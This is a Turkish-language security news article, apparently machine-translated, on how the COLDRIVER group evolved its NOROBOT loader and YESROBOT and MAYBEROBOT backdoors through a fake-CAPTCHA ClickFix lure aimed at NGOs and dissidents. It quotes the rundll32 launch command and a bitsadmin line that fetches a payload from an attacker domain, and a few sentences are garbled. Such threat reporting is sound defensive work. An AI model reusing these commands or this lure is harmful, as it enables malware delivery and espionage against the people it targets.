2025 yazında, LOSTKEYS implantının kamuoyuna açıklanmasının ardından yeni bir kötü amaçlı yazılım ailesi ortaya çıktı.
Bu yeni tür, politika danışmanlarına, sivil toplum kuruluşlarına ve muhaliflere karşı yürütülen bir dizi yüksek hedefli kampanyayla hızla silah haline getirildi.
COLDCOPY ClickFix olarak bilinen yenilenmiş bir tuzaktan yararlanan tehdit aktörleri, kullanıcıları kötü amaçlı bir DLL çalıştırmaya yönlendirmek için yükü CAPTCHA doğrulaması olarak gizledi. rundll32.
İlk örnekler, indirici bileşeninin ve arka kapı aşamalarının birden fazla yinelenmesiyle belirlenen agresif bir geliştirme temposunu gösterdi.
Google Cloud analistleri, NOROBOT adlı yükleyicinin, LOSTKEYS’in profili oluşturulduktan birkaç gün sonra dağıtıma başladığını belirtti.
Çok aşamalı PowerShell yaklaşımına dayanan öncülünden farklı olarak NOROBOT, rundll32 iamnotarobot.dll,humanCheck enfeksiyon zincirini başlatmak için.
Sonraki aşamalar, saldırganın kontrol ettiği altyapıdan kısmi kriptografi anahtarları ve tamamlayıcı veriler getirerek bileşenleri yeniden birleştirerek bir Python arka kapısı olan YESROBOT’un şifresini çözüp kurdu.
İlk operasyonlarda YESROBOT’un Mayıs ayının sonlarında kısa bir süre konuşlandırıldığı görüldü ve ardından yerini hızlı bir şekilde geliştirilmiş bir PowerShell arka kapısı olan MAYBEROBOT aldı.
Bu değişiklik, paket halindeki Python yorumlayıcısı tarafından oluşturulan algılama gürültüsünü giderdi ve tam bir yorumlayıcı çalışma zamanı gerektirmeden daha esnek komut yürütme olanağı sağladı.
Her iki arka kapı da operatörün HTTPS üzerinden sabit kodlu bir komut ve kontrol sunucusuna karmaşık komutlar sağlamasına güvenerek minimum yerleşik işlevleri sürdürdü.
Birkaç ay içinde kötü amaçlı yazılım, yalnızca basitleştirilmiş dağıtım değil, aynı zamanda ağ savunucularından kaçmak için dönüşümlü altyapı ve dosya adlandırma kuralları sergileyerek üçüncü büyük yinelemesine ulaştı.
Kötü amaçlı yazılım geliştirmeye genel bakış, ilk karmaşık indiriciden yoğunlaştırılmış oturum açma komut dosyası mekanizmasına kadar bu evrimi göstermektedir.
.webp)
Kullanıcıyı NOROBOT’u çalıştırmaya ikna etmeye çalışan COLDCOPY, görünüşte zararsız bir DLL dosyasını çalıştırmaları için hedefleri kandırmak için kullanılan sosyal mühendisliği vurgular.
Enfeksiyon Mekanizması
Bulaşma, bir kullanıcı özel CAPTCHA gibi görünen, güvenliği ihlal edilmiş bir sayfayı ziyaret ettiğinde başlar. Sayfa şunun yürütülmesini ister: iamnotarobot.dllçağırarak humanCheck ihracat.
NOROBOT yüklendikten sonra şifrelenmiş yük parçalarını bitsadmin aracılığıyla alır: –
bitsadmin /transfer downloadJob /download /priority normal https://inspectguarantee.org/libsystemhealthcheck.py %APPDATA%\libsystemhealthcheck.pyDaha sonra yükleyici, AES anahtarının bir kısmını kayıt defterine yazar ve son veriyi bir araya getirmek ve şifresini çözmek için bir görev planlar.
Bu aşamalı yaklaşım, savunucuları zincirin tamamını yeniden oluşturmak için birden fazla yapıyı (indirmeler, kayıt defteri girişleri, zamanlanmış görevler) toplamaya zorlar.
COLDRIVER, kriptografik anahtarları ve alternatif indirici karmaşıklığını bölerek, yüksek değerli hedeflerden istihbarat toplarken operasyonel güvenliği korur.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
